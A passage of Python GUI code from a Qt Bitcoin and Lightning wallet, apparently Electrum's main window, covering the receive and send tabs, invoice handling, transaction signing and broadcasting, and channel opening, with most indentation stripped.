if self.fx.is_enabled():
text += self.fx.get_fiat_status_text(c + u + x,
self.base_unit(), self.get_decimal_point()) or ''
if not self.network.proxy:
icon = read_QIcon("status_connected%s.png"%fork_str)
else:
icon = read_QIcon("status_connected_proxy%s.png"%fork_str)
else:
if self.network.proxy:
text = "{} ({})".format(_("Not connected"), _("proxy enabled"))
else:
text = _("Not connected")
icon = read_QIcon("status_disconnected.png")
self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename()))
self.balance_label.setText(text)
if self.status_button:
            self.status_button.setIcon(icon)
def update_wallet(self):
self.update_status()
if self.wallet.up_to_date or not self.network or not self.network.is_connected():
self.update_tabs()
def update_tabs(self, wallet=None):
if wallet is None:
wallet = self.wallet
if wallet != self.wallet:
return
self.history_model.refresh('update_tabs')
self.request_list.update()
self.address_list.update()
self.utxo_list.update()
self.contact_list.update()
self.invoice_list.update()
self.channels_list.update_rows.emit(wallet)
self.update_completions()
def create_channels_tab(self):
self.channels_list = ChannelsList(self)
t = self.channels_list.get_toolbar()
return self.create_list_tab(self.channels_list, t)
def create_history_tab(self):
self.history_model = HistoryModel(self)
self.history_list = l = HistoryList(self, self.history_model)
self.history_model.set_view(self.history_list)
l.searchable_list = l
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_history', False))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def show_address(self, addr):
from . import address_dialog
d = address_dialog.AddressDialog(self, addr)
d.exec_()
def show_channel(self, channel_id):
from . import channel_details
channel_details.ChannelDetailsDialog(self, channel_id).show()
def show_transaction(self, tx, *, tx_desc=None):
'''tx_desc is set only for txs created in the Send tab'''
show_transaction(tx, parent=self, desc=tx_desc)
def show_lightning_transaction(self, tx_item):
from .lightning_tx_dialog import LightningTxDialog
d = LightningTxDialog(self, tx_item)
d.show()
def create_receive_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.receive_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
self.receive_message_e = QLineEdit()
grid.addWidget(QLabel(_('Description')), 0, 0)
grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
self.receive_message_e.textChanged.connect(self.update_receive_qr)
self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
grid.addWidget(QLabel(_('Requested amount')), 1, 0)
grid.addWidget(self.receive_amount_e, 1, 1)
self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.connect_fields(self, self.amount_e, self.fiat_send_e, None)
self.expires_combo = QComboBox()
evl = sorted(pr_expiration_values.items())
evl_keys = [i[0] for i in evl]
evl_values = [i[1] for i in evl]
default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
try:
i = evl_keys.index(default_expiry)
except ValueError:
i = 0
self.expires_combo.addItems(evl_values)
self.expires_combo.setCurrentIndex(i)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
def on_expiry(i):
self.config.set_key('request_expiry', evl_keys[i])
self.expires_combo.currentIndexChanged.connect(on_expiry)
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The bitcoin address never expires and will always be part of this electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Expires after'), msg), 2, 0)
grid.addWidget(self.expires_combo, 2, 1)
self.expires_label = QLineEdit('')
        self.expires_label.setReadOnly(True)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 2, 1)
self.clear_invoice_button = QPushButton(_('Clear'))
self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
self.create_invoice_button = QPushButton(_('Request'))
self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
self.create_invoice_button.setToolTip('Create on-chain request')
self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_invoice_button)
buttons.addWidget(self.create_invoice_button)
if self.wallet.has_lightning():
self.create_invoice_button.setText(_('On-chain'))
self.create_lightning_invoice_button = QPushButton(_('Lightning'))
self.create_lightning_invoice_button.setToolTip('Create lightning request')
self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
buttons.addWidget(self.create_lightning_invoice_button)
grid.addLayout(buttons, 4, 3, 1, 2)
self.receive_payreq_e = ButtonsTextEdit()
self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
self.receive_payreq_e.addCopyButton(self.app)
self.receive_payreq_e.setReadOnly(True)
self.receive_payreq_e.textChanged.connect(self.update_receive_qr)
self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus)
self.receive_qr = QRCodeWidget(fixedSize=220)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_address_e = ButtonsTextEdit()
self.receive_address_e.setFont(QFont(MONOSPACE_FONT))
self.receive_address_e.addCopyButton(self.app)
self.receive_address_e.setReadOnly(True)
self.receive_address_e.textChanged.connect(self.update_receive_address_styling)
qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self)
qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code"))
self.receive_requests_label = QLabel(_('Incoming payments'))
from .request_list import RequestList
self.request_list = RequestList(self)
receive_tabs = QTabWidget()
receive_tabs.addTab(self.receive_address_e, _('Address'))
receive_tabs.addTab(self.receive_payreq_e, _('Request'))
receive_tabs.addTab(self.receive_qr, _('QR Code'))
receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0))
receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i))
receive_tabs_sp = receive_tabs.sizePolicy()
receive_tabs_sp.setRetainSizeWhenHidden(True)
receive_tabs.setSizePolicy(receive_tabs_sp)
def maybe_hide_receive_tabs():
receive_tabs.setVisible(bool(self.receive_payreq_e.text()))
self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs)
maybe_hide_receive_tabs()
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addStretch()
hbox.addWidget(receive_tabs)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_requests(self, keys):
for key in keys:
self.wallet.delete_request(key)
self.request_list.update()
self.clear_receive_tab()
def delete_lightning_payreq(self, payreq_key):
self.wallet.lnworker.delete_invoice(payreq_key)
self.request_list.update()
self.invoice_list.update()
self.clear_receive_tab()
def sign_payment_request(self, addr):
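        """If an OpenAlias is configured and resolves to one of our own
        addresses, sign the payment request for `addr` with it, prompting
        for the password if the keystore is encrypted."""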
alias = self.config.get('alias')
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(repr(e))
return
else:
return
def create_invoice(self, is_lightning):
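        """Create a new receive request (lightning invoice or on-chain
        address request), select it in the request list, clear the entry
        fields and copy the resulting invoice/address to the clipboard."""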
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
if is_lightning:
key = self.wallet.lnworker.add_request(amount, message, expiry)
else:
key = self.create_bitcoin_request(amount, message, expiry)
if not key:
return
self.address_list.update()
assert key is not None
self.request_list.update()
self.request_list.select_key(key)
# clear request fields
self.receive_amount_e.setText('')
self.receive_message_e.setText('')
# copy to clipboard
r = self.wallet.get_request(key)
content = r.invoice if r.is_lightning() else r.get_address()
title = _('Invoice') if is_lightning else _('Address')
self.do_copy(content, title=title)
def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]:
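        """Pick (or create) a receiving address and register an on-chain
        payment request for it. Returns the address, or None if the user
        aborts or the request cannot be added."""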
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic(): # imported wallet
msg = [
_('No more addresses in your wallet.'), ' ',
_('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ',
_('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n',
_('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'),
]
if not self.question(''.join(msg)):
return
addr = self.wallet.get_receiving_address()
else: # deterministic wallet
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
req = self.wallet.make_payment_request(addr, amount, message, expiration)
try:
self.wallet.add_payment_request(req)
except Exception as e:
self.logger.exception('Error adding payment request')
self.show_error(_('Error adding payment request') + ':\n' + repr(e))
else:
self.sign_payment_request(addr)
return addr
def do_copy(self, content: str, *, title: str = None) -> None:
self.app.clipboard().setText(content)
if title is None:
tooltip_text = _("Text copied to clipboard").format(title)
else:
tooltip_text = _("{} copied to clipboard").format(title)
QToolTip.showText(QCursor.pos(), tooltip_text, self)
def clear_receive_tab(self):
self.receive_payreq_e.setText('')
self.receive_address_e.setText('')
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
self.request_list.clearSelection()
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def update_receive_qr(self):
uri = str(self.receive_payreq_e.text())
if maybe_extract_bolt11_invoice(uri):
# encode lightning invoices as uppercase so QR encoding can use
# alphanumeric mode; resulting in smaller QR codes
uri = uri.upper()
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.qrw.setData(uri)
def update_receive_address_styling(self):
addr = str(self.receive_address_e.text())
if is_address(addr) and self.wallet.is_used(addr):
self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
self.receive_address_e.setToolTip(_("This address has already been used. "
"For better privacy, do not reuse it for new payments."))
else:
self.receive_address_e.setStyleSheet("")
self.receive_address_e.setToolTip("")
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.set_completer(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = FreezableLineEdit()
self.message_e.setMinimumWidth(700)
grid.addWidget(self.message_e, 2, 1, 1, -1)
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 3, 0)
grid.addWidget(self.amount_e, 3, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 3, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(100)
self.max_button.setCheckable(True)
grid.addWidget(self.max_button, 3, 3)
self.save_button = EnterButton(_("Save"), self.do_save_invoice)
self.send_button = EnterButton(_("Pay") + "...", self.do_pay)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.save_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 4)
self.amount_e.shortcut.connect(self.spend_max)
def reset_max(text):
self.max_button.setChecked(False)
enable = not bool(text) and not self.amount_e.isReadOnly()
#self.max_button.setEnabled(enable)
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
self.set_onchain(False)
self.invoices_label = QLabel(_('Outgoing payments'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
hbox.addStretch(1)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
if run_hook('abort_send', self):
return
outputs = self.payto_e.get_outputs(True)
if not outputs:
return
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=self.get_coins(),
outputs=outputs,
fee=fee_est,
is_sweep=False)
try:
tx = make_tx(None)
except (NotEnoughFunds, NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs) as e:
self.max_button.setChecked(False)
self.show_error(str(e))
return
self.max_button.setChecked(True)
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
self.amount_e.setAmount(amount_after_all_fees)
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
@protected
def protect(self, func, args, password):
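        # The `@protected` decorator prompts for the wallet password (if the
        # wallet has one) and passes it in as `password`; forward it to `func`.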
return func(*args, password)
def read_outputs(self) -> List[PartialTxOutput]:
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
outputs = self.payto_e.get_outputs(self.max_button.isChecked())
return outputs
def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool:
"""Returns whether there are errors with outputs.
Also shows error dialog to user if so.
"""
if not outputs:
self.show_error(_('No outputs'))
return True
for o in outputs:
if o.scriptpubkey is None:
self.show_error(_('Bitcoin Address is None'))
return True
if o.value is None:
self.show_error(_('Invalid Amount'))
return True
return False # no errors
def check_send_tab_payto_line_and_show_errors(self) -> bool:
"""Returns whether there are errors.
Also shows error dialog to user if so.
"""
pr = self.payment_request
if pr:
if pr.has_expired():
self.show_error(_('Payment request has expired'))
return True
if not pr:
errors = self.payto_e.get_errors()
if errors:
if len(errors) == 1 and not errors[0].is_multiline:
err = errors[0]
self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" +
f"{err.line_content[:40]}...\n\n"
f"{err.exc!r}")
else:
self.show_warning(_("Invalid Lines found:") + "\n\n" +
'\n'.join([_("Line #") +
f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})"
for err in errors]))
return True
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return True
return False # no errors
def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]):
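        """Ask the user to confirm the amount, then pay the invoice via
        lnworker on the wallet's background thread."""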
if amount_msat is None:
raise Exception("missing amount for LN invoice")
amount_sat = Decimal(amount_msat) / 1000
# FIXME this is currently lying to user as we truncate to satoshis
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat))
if not self.question(msg):
return
attempts = LN_NUM_PAYMENT_ATTEMPTS
def task():
self.wallet.lnworker.pay(invoice, amount_msat=amount_msat, attempts=attempts)
self.do_clear()
self.wallet.thread.add(task)
self.invoice_list.update()
def on_request_status(self, wallet, key, status):
if wallet != self.wallet:
return
if key not in self.wallet.receive_requests:
return
if status == PR_PAID:
self.notify(_('Payment received') + '\n' + key)
self.need_update.set()
def on_invoice_status(self, wallet, key):
if wallet != self.wallet:
return
req = self.wallet.get_invoice(key)
if req is None:
return
self.invoice_list.update_item(key, req)
def on_payment_succeeded(self, wallet, key):
description = self.wallet.get_label(key)
self.notify(_('Payment succeeded') + '\n\n' + description)
self.need_update.set()
def on_payment_failed(self, wallet, key, reason):
self.show_error(_('Payment failed') + '\n\n' + reason)
def read_invoice(self):
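        """Build an invoice from the current contents of the send tab:
        a lightning invoice if the tab is in lightning mode, otherwise an
        on-chain invoice from the parsed outputs. Returns None (after
        showing an error) if the form contents are invalid."""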
if self.check_send_tab_payto_line_and_show_errors():
return
if not self._is_onchain:
invoice_str = self.payto_e.lightning_invoice
if not invoice_str:
return
if not self.wallet.has_lightning():
self.show_error(_('Lightning is disabled'))
return
invoice = LNInvoice.from_bech32(invoice_str)
if invoice.get_amount_msat() is None:
amount_sat = self.amount_e.get_amount()
if amount_sat:
invoice.amount_msat = int(amount_sat * 1000)
else:
self.show_error(_('No amount'))
return
return invoice
else:
outputs = self.read_outputs()
if self.check_send_tab_onchain_outputs_and_show_errors(outputs):
return
message = self.message_e.text()
return self.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.payto_URI)
def do_save_invoice(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.do_clear()
self.invoice_list.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.wallet.save_invoice(invoice)
self.invoice_list.update()
self.do_clear()
self.do_pay_invoice(invoice)
def pay_multiple_invoices(self, invoices):
outputs = []
for invoice in invoices:
outputs += invoice.outputs
self.pay_onchain_dialog(self.get_coins(), outputs)
def do_pay_invoice(self, invoice: 'Invoice'):
if invoice.type == PR_TYPE_LN:
assert isinstance(invoice, LNInvoice)
self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat())
elif invoice.type == PR_TYPE_ONCHAIN:
assert isinstance(invoice, OnchainInvoice)
self.pay_onchain_dialog(self.get_coins(), invoice.outputs)
else:
raise Exception('unknown invoice type')
def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]:
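        """Return the coins to spend: the manual coin-control selection if
        one is active, otherwise all spendable coins of the wallet."""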
coins = self.get_manually_selected_coins()
if coins is not None:
return coins
else:
return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only)
def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]:
"""Return a list of selected coins or None.
Note: None means selection is not being used,
while an empty sequence means the user specifically selected that.
"""
return self.utxo_list.get_spend_list()
def pay_onchain_dialog(self, inputs: Sequence[PartialTxInput],
outputs: List[PartialTxOutput], *,
external_keypairs=None) -> None:
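        """Let the user review the fee (and enter the password) in
        ConfirmTxDialog, then sign and broadcast the transaction, or open
        the advanced preview dialog instead."""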
# trustedcoin requires this
if run_hook('abort_send', self):
return
is_sweep = bool(external_keypairs)
make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
coins=inputs,
outputs=outputs,
fee=fee_est,
is_sweep=is_sweep)
output_values = [x.value for x in outputs]
if output_values.count('!') > 1:
self.show_error(_("More than one output set to spend max"))
return
output_value = '!' if '!' in output_values else sum(output_values)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
if d.not_enough_funds:
# Check if we had enough funds excluding fees,
# if so, still provide opportunity to set lower fees.
if not d.have_enough_funds_assuming_zero_fees():
self.show_message(_('Not Enough Funds'))
return
# shortcut to advanced preview (after "enough funds" check!)
if self.config.get('advanced_preview'):
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
return
cancelled, is_send, password, tx = d.run()
if cancelled:
return
if is_send:
def sign_done(success):
if success:
self.broadcast_or_show(tx)
self.sign_tx_with_password(tx, callback=sign_done, password=password,
external_keypairs=external_keypairs)
else:
self.preview_tx_dialog(make_tx=make_tx,
external_keypairs=external_keypairs)
def preview_tx_dialog(self, *, make_tx, external_keypairs=None):
d = PreviewTxDialog(make_tx=make_tx, external_keypairs=external_keypairs,
window=self)
d.show()
def broadcast_or_show(self, tx: Transaction):
if not tx.is_complete():
self.show_transaction(tx)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
self.show_transaction(tx)
return
self.broadcast_transaction(tx)
@protected
def sign_tx(self, tx, *, callback, external_keypairs, password):
self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_success(result):
callback(True)
def on_failure(exc_info):
self.on_error(exc_info)
callback(False)
on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
if external_keypairs:
# can sign directly
task = partial(tx.sign, external_keypairs)
else:
task = partial(self.wallet.sign_transaction, tx, password)
msg = _('Signing transaction...')
WaitingDialog(self, msg, task, on_success, on_failure)
def broadcast_transaction(self, tx: Transaction):
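        """Broadcast `tx` on a background thread (handling any pending BIP70
        payment request) and report the outcome in the GUI thread."""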
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Invoice has expired")
try:
self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
except TxBroadcastError as e:
return False, e.get_message_for_gui()
except BestEffortRequestFailed as e:
return False, repr(e)
# success
txid = tx.txid()
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, funding_sat):
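        """Return a callable mapping a fee estimate to an unsigned channel
        funding transaction; used with ConfirmTxDialog in open_channel()."""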
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(coins=coins,
funding_sat=funding_sat,
fee_est=fee_est)
return make_tx
def open_channel(self, connect_str, funding_sat, push_amt):
try:
extract_nodeid(connect_str)
except ConnStringFormatError as e:
self.main_window.show_error(str(e))
return
# use ConfirmTxDialog
# we need to know the fee before we broadcast, because the txid is required
make_tx = self.mktx_for_open_channel(funding_sat)
d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
# disable preview button because the user must not broadcast tx before establishment_flow
d.preview_button.setEnabled(False)
cancelled, is_send, password, funding_tx = d.run()
if not is_send:
return
if cancelled:
return
# read funding_sat from tx; converts '!' to int value
funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
def task():
return self.wallet.lnworker.open_channel(connect_str=connect_str,
funding_tx=funding_tx,
funding_sat=funding_sat,
push_amt_sat=push_amt,
password=password)
def on_success(args):
chan, funding_tx = args
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
if not funding_tx.is_complete():
self.show_transaction(funding_tx)
def on_failure(exc_info):
type_, e, traceback = exc_info
self.show_error(_('Could not open channel: {}').format(repr(e)))
WaitingDialog(self, _('Opening channel...'), task, on_success, on_failure)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
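        """Callback passed to util.parse_URI: called once a BIP70 payment
        request has been fetched; verify it and notify the GUI thread via
        the ok/error signals."""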
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def parse_lightning_invoice(self, invoice):
"""Parse ln invoice, and prepare the send tab for it."""
try:
lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
except Exception as e:
raise LnDecodeException(e) from e
pubkey = bh2u(lnaddr.pubkey.serialize())
for k,v in lnaddr.tags:
if k == 'd':
description = v
break
else:
description = ''
self.payto_e.setFrozen(True)
self.payto_e.setText(pubkey)
self.message_e.setText(description)
if lnaddr.get_amount_sat() is not None:
self.amount_e.setAmount(lnaddr.get_amount_sat())
#self.amount_e.textEdited.emit("")
self.set_onchain(False)
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
self.wallet.set_frozen_state_of_coins(utxos, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
